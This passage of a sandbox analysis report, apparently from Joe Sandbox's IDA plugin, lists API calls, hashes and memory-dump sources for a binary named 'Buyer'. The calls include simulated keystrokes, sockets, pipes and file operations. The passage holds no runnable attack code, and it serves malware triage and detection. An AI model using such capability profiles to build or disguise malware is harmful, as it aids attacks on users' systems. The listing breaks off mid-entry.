                                                                                                    • Opcode ID: 1a16a3732140d01ffed16a0ec63eb553ddff15e244691e709c5574f713c7430c
                                                                                                    • Instruction ID: 837f6cb51ad37ca9972170513084f41407ef4cbb3194a51f84f391443f8335a1
                                                                                                    • Opcode Fuzzy Hash: 1a16a3732140d01ffed16a0ec63eb553ddff15e244691e709c5574f713c7430c
                                                                                                    • Instruction Fuzzy Hash: AE718F74A05244AFDB219F65C884FAA7BBBFF453A0F18405BE85597351CB32EC42EB10
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 00FAB5FA
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAB60F
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAB670
                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FAB69E
                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FAB6BD
                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FAB6FE
                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FAB721
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: 7e934ac014dd825d9c3e0225f1b9278d15273704ca297d569eaee865fd6d1ea0
                                                                                                    • Instruction ID: b16c4e8878b314c848852d3c8db096d6fd0bcc0f16edcb019ae0caf8161fe1b0
                                                                                                    • Opcode Fuzzy Hash: 7e934ac014dd825d9c3e0225f1b9278d15273704ca297d569eaee865fd6d1ea0
                                                                                                    • Instruction Fuzzy Hash: BE51CDE0E087D63DFB3642348C49BBABEA95B47314F088589E1D9568D3D3D8EC94E760
                                                                                                    APIs
                                                                                                    • GetParent.USER32(00000000), ref: 00FAB41A
                                                                                                    • GetKeyboardState.USER32(?), ref: 00FAB42F
                                                                                                    • SetKeyboardState.USER32(?), ref: 00FAB490
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FAB4BC
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FAB4D9
                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FAB518
                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FAB539
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                    • String ID:
                                                                                                    • API String ID: 87235514-0
                                                                                                    • Opcode ID: d53005d733f889f9f745847668bd953045aa33fe22fae07a4a3f4b23ce736ecb
                                                                                                    • Instruction ID: 2454bed1002d5901f6a451190d0806577ca5982e30f7b81be57c7fb0b48f928a
                                                                                                    • Opcode Fuzzy Hash: d53005d733f889f9f745847668bd953045aa33fe22fae07a4a3f4b23ce736ecb
                                                                                                    • Instruction Fuzzy Hash: F951B0E0D086D67DFB3687248C55B7ABEA96B0B310F0C8489E5D9568C3D398EC98F750
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00F84667,?,?,?,?,?,?,?,?,00F75EF3,?,?,00F84667,?,?), ref: 00F757C0
                                                                                                    • __fassign.LIBCMT ref: 00F7583B
                                                                                                    • __fassign.LIBCMT ref: 00F75856
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00F84667,00000005,00000000,00000000), ref: 00F7587C
                                                                                                    • WriteFile.KERNEL32(?,00F84667,00000000,00F75EF3,00000000,?,?,?,?,?,?,?,?,?,00F75EF3,?), ref: 00F7589B
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00F75EF3,00000000,?,?,?,?,?,?,?,?,?,00F75EF3,?), ref: 00F758D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: d91b37a52cfe13dfcaa8fbecd578b05cd9a08a9d179c49f545720cb5bab3225f
                                                                                                    • Instruction ID: 89dc228d70648988cb1226ccf4251214863ed67bf88e84caa366d5689fa2d85a
                                                                                                    • Opcode Fuzzy Hash: d91b37a52cfe13dfcaa8fbecd578b05cd9a08a9d179c49f545720cb5bab3225f
                                                                                                    • Instruction Fuzzy Hash: 2D51C171E002499FDF10CFA8E845AEEBBB9EF08710F14811FE559E7291D7709A41DB62
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F6309B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F630A3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F63131
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F6315C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F631B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 837831912682b2955cf421c9177070ce6bb504095a9c4d7a94c4e0869ecde7ec
                                                                                                    • Instruction ID: feee945b61040bb61c8340c10e6652fb0cfb4af990be8efa0681ad10f71a8955
                                                                                                    • Opcode Fuzzy Hash: 837831912682b2955cf421c9177070ce6bb504095a9c4d7a94c4e0869ecde7ec
                                                                                                    • Instruction Fuzzy Hash: 6341D134E00218ABCF10DF69CC85A9EBBF5AF45328F148159E819AB392D735DB45EB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FC37D5: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC3801
                                                                                                      • Part of subcall function 00FC37D5: _wcslen.LIBCMT ref: 00FC3822
                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FC1899
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC18A8
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC1950
                                                                                                    • closesocket.WSOCK32(00000000), ref: 00FC1980
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                    • String ID:
                                                                                                    • API String ID: 2675159561-0
                                                                                                    • Opcode ID: 45d7d899c4db7f9ea529462da3992c60a18c4c2a06fd812499d6d5ce915e0ec3
                                                                                                    • Instruction ID: c64cc935c74fc88ee7b0957ed0cc2c7420edb37896478671cad63a04e782a5d9
                                                                                                    • Opcode Fuzzy Hash: 45d7d899c4db7f9ea529462da3992c60a18c4c2a06fd812499d6d5ce915e0ec3
                                                                                                    • Instruction Fuzzy Hash: DA412531A00209AFDB109F24C945FA97BEAFF46364F148059FC059B292C774ED41EBE0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FAD507,?), ref: 00FAE43E
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FAD507,?), ref: 00FAE457
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00FAD52A
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAD564
                                                                                                    • _wcslen.LIBCMT ref: 00FAD5EA
                                                                                                    • _wcslen.LIBCMT ref: 00FAD600
                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00FAD646
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                    • Opcode ID: 30b76daec01fd4b416cb470f036b6f9689ccc997f201d2def04e9c63625ca722
                                                                                                    • Instruction ID: 07eb6443f8be75089b846d002347ccff0a1171a4ff457787b28ce4f3069545ef
                                                                                                    • Opcode Fuzzy Hash: 30b76daec01fd4b416cb470f036b6f9689ccc997f201d2def04e9c63625ca722
                                                                                                    • Instruction Fuzzy Hash: B14152B5D452189FDF12EBA4CD81ADD77B8AF09344F0400E6A506EB641EB38AB88DF50
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FD35DA
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD360D
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD3642
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FD3674
                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FD369E
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD36AF
                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FD36C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                     • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                     • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                     • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                     • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                     • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178440468-0
                                                                                                    • Opcode ID: 6383b006c84d08591215c3f6f4eb9db0dc00f60111a29651b7d96fe6afca7d93
                                                                                                    • Instruction ID: 7fabbf150242d6ab7e299e8943d8c0a6acf91da958987b610847ccb21cf1692c
                                                                                                    • Opcode Fuzzy Hash: 6383b006c84d08591215c3f6f4eb9db0dc00f60111a29651b7d96fe6afca7d93
                                                                                                    • Instruction Fuzzy Hash: 47311935A45254AFDB21DF18DC84F5937A2FB49760F1901A6F6408F3B2CB75E940EB42
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00FB0BC3
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB0BFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: 878830d7572680e6edd054a6b2528f4285c1e70053f3c03c1f4042e0b0896423
                                                                                                    • Instruction ID: d6bcd322e5d1e32e937b4bb19c7c3823d41308090087c1240f2833b695ba49e4
                                                                                                    • Opcode Fuzzy Hash: 878830d7572680e6edd054a6b2528f4285c1e70053f3c03c1f4042e0b0896423
                                                                                                    • Instruction Fuzzy Hash: 5A213DB5900309ABDB209F2ADC45ADB7BA8BF45724F204B19F8A1D72D0EB70D950EF50
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00FB0C97
                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FB0CD2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandlePipe
                                                                                                    • String ID: nul
                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                    • Opcode ID: bec143d248c0f6239117ad610bb805a2d2445a71d286a5683d354da6ff093217
                                                                                                    • Instruction ID: fb85d4b382fb74a689f42def2ca7b39515e7251708d2bf80e8ca400e50790c9f
                                                                                                    • Opcode Fuzzy Hash: bec143d248c0f6239117ad610bb805a2d2445a71d286a5683d354da6ff093217
                                                                                                    • Instruction Fuzzy Hash: 69211D759003099BDB209F6ADC44ADE7BA8AF59734F200A19E9A5D72D1DF70E840EF50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F466CB: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F46709
                                                                                                      • Part of subcall function 00F466CB: GetStockObject.GDI32(00000011), ref: 00F4671D
                                                                                                      • Part of subcall function 00F466CB: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F46727
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FD48D2
                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FD48DF
                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FD48EA
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FD48F9
                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FD4905
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                    • String ID: Msctls_Progress32
                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                    • Opcode ID: a76e8957d9e224b012a15a9cdceff3cae3482b28950dbadc13a4a6edaecea9bd
                                                                                                    • Instruction ID: ba703bfbe29dc7e8c351b5affc5de294978a0d49916b7de535960fce1c626c97
                                                                                                    • Opcode Fuzzy Hash: a76e8957d9e224b012a15a9cdceff3cae3482b28950dbadc13a4a6edaecea9bd
                                                                                                    • Instruction Fuzzy Hash: 3311B2B215021DBFEF118E65CC81EE77F9DEF08798F014111FA48A6190C6769C62EBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F7DAF4: _free.LIBCMT ref: 00F7DB1D
                                                                                                    • _free.LIBCMT ref: 00F7DB7E
                                                                                                      • Part of subcall function 00F72D18: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4), ref: 00F72D2E
                                                                                                      • Part of subcall function 00F72D18: GetLastError.KERNEL32(01011DB4,?,00F7DB22,01011DB4,00000000,01011DB4,00000000,?,00F7DB49,01011DB4,00000007,01011DB4,?,00F7DF46,01011DB4,01011DB4), ref: 00F72D40
                                                                                                    • _free.LIBCMT ref: 00F7DB89
                                                                                                    • _free.LIBCMT ref: 00F7DB94
                                                                                                    • _free.LIBCMT ref: 00F7DBE8
                                                                                                    • _free.LIBCMT ref: 00F7DBF3
                                                                                                    • _free.LIBCMT ref: 00F7DBFE
                                                                                                    • _free.LIBCMT ref: 00F7DC09
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                                                                                    • Instruction ID: ccb7db3bc4f24a318d1c7795958a8a13b9f333dbfd812d5c5c6c74acd4260e73
                                                                                                    • Opcode Fuzzy Hash: 5bed66935a953271b091b4d9d44be1d81363ccd6ac0d0396f486d9816b5a5bca
                                                                                                    • Instruction Fuzzy Hash: C3114F71544B05AAF570F7B0CC07FCB77AC6F40700F848816B2ADA6053DAEDF505A692
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00FAE062
                                                                                                    • LoadStringW.USER32(00000000), ref: 00FAE069
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00FAE07F
                                                                                                    • LoadStringW.USER32(00000000), ref: 00FAE086
                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FAE0CA
                                                                                                    Strings
                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00FAE0A7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadModuleString$Message
                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                    • API String ID: 4072794657-3128320259
                                                                                                    • Opcode ID: 9eb2bb11d6902cbf6be1fcb9de3c7c1fddd22337b658f4fa6fd4569d84cd52c9
                                                                                                    • Instruction ID: a104f63f8c05cc7c288b272b9926a5f035559ed363e55147e587da81320db980
                                                                                                    • Opcode Fuzzy Hash: 9eb2bb11d6902cbf6be1fcb9de3c7c1fddd22337b658f4fa6fd4569d84cd52c9
                                                                                                    • Instruction Fuzzy Hash: E40181F690020C7FE711A7A0DD89FFB776CDB08300F0145A2B74AE2042EA749E84AB71
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(0106DC88,0106DC88), ref: 00FB104C
                                                                                                    • EnterCriticalSection.KERNEL32(0106DC68,00000000), ref: 00FB105E
                                                                                                    • TerminateThread.KERNEL32(0106DC80,000001F6), ref: 00FB106C
                                                                                                    • WaitForSingleObject.KERNEL32(0106DC80,000003E8), ref: 00FB107A
                                                                                                    • CloseHandle.KERNEL32(0106DC80), ref: 00FB1089
                                                                                                    • InterlockedExchange.KERNEL32(0106DC88,000001F6), ref: 00FB1099
                                                                                                    • LeaveCriticalSection.KERNEL32(0106DC68), ref: 00FB10A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3495660284-0
                                                                                                    • Opcode ID: 91a014fa53cef9e1ac239076cc5b3cde4471b745285328a24c03751a552d718f
                                                                                                    • Instruction ID: 4bff7cfa119095094f51deb803a14e2d0cfffe01ce6fd55e70a99580f4c838fc
                                                                                                    • Opcode Fuzzy Hash: 91a014fa53cef9e1ac239076cc5b3cde4471b745285328a24c03751a552d718f
                                                                                                    • Instruction Fuzzy Hash: B4F0EC32443616BBD7522F64EE49BD6BB3AFF45353F801122F101958A0C77495A5EF90
                                                                                                    APIs
                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FC2547
                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FC2568
                                                                                                    • WSAGetLastError.WSOCK32 ref: 00FC2579
                                                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00FC2662
                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00FC2613
                                                                                                      • Part of subcall function 00FA40D3: _strlen.LIBCMT ref: 00FA40DD
                                                                                                      • Part of subcall function 00FC39AB: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00FBF393), ref: 00FC39C7
                                                                                                    • _strlen.LIBCMT ref: 00FC26BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                    • String ID:
                                                                                                    • API String ID: 3203458085-0
                                                                                                    • Opcode ID: b1f6dfbc944ebbaf28b4cd3113924a833554adb434c4fab2f4b70594a84259f8
                                                                                                    • Instruction ID: 4591292a7c5f775ecf5f2392358897014c20c9a16f135c227c324eb8a04ae128
                                                                                                    • Opcode Fuzzy Hash: b1f6dfbc944ebbaf28b4cd3113924a833554adb434c4fab2f4b70594a84259f8
                                                                                                    • Instruction Fuzzy Hash: 1EB1D231604301AFC314DF24CC96F2ABBA5EF85318F54854CF45A4B2A2DB75ED46EB92
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F463ED
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F4642E
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00F46456
                                                                                                    • GetClientRect.USER32(?,?), ref: 00F46594
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F465B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1296646539-0
                                                                                                    • Opcode ID: f805bb5cb3873942ff106e2f6f683d4fb432acdae2e8496800fa045a829b7d6d
                                                                                                    • Instruction ID: 3e47a41dcb220ae5781c5973aa337c031861e88e1316417602c851b74fbdc852
                                                                                                    • Opcode Fuzzy Hash: f805bb5cb3873942ff106e2f6f683d4fb432acdae2e8496800fa045a829b7d6d
                                                                                                    • Instruction Fuzzy Hash: D0B16879A0064ADBDB14DFB8C4807EABBF1FF58310F14841AE8AAD7254DB34E950EB51
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00F7037A
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F70396
                                                                                                    • __allrem.LIBCMT ref: 00F703AD
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F703CB
                                                                                                    • __allrem.LIBCMT ref: 00F703E2
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F70400
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                                                                    • Instruction ID: 39d5a6963b9d937a975321674a80690dcf4ee5975f3dca05a2c1d5642aeb55a2
                                                                                                    • Opcode Fuzzy Hash: 8cf0651829415527d5c628b1b57484c99734d042a52203334b1857180c4d1198
                                                                                                    • Instruction Fuzzy Hash: 8881D972A00706DBE7209E68CC85B6A73E9AF41734F24C12FF519D6682EF74E940E752
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F68629,00F68629,?,?,?,00F7679F,00000001,00000001,8BE85006), ref: 00F765A8
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F7679F,00000001,00000001,8BE85006,?,?,?), ref: 00F7662E
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F76728
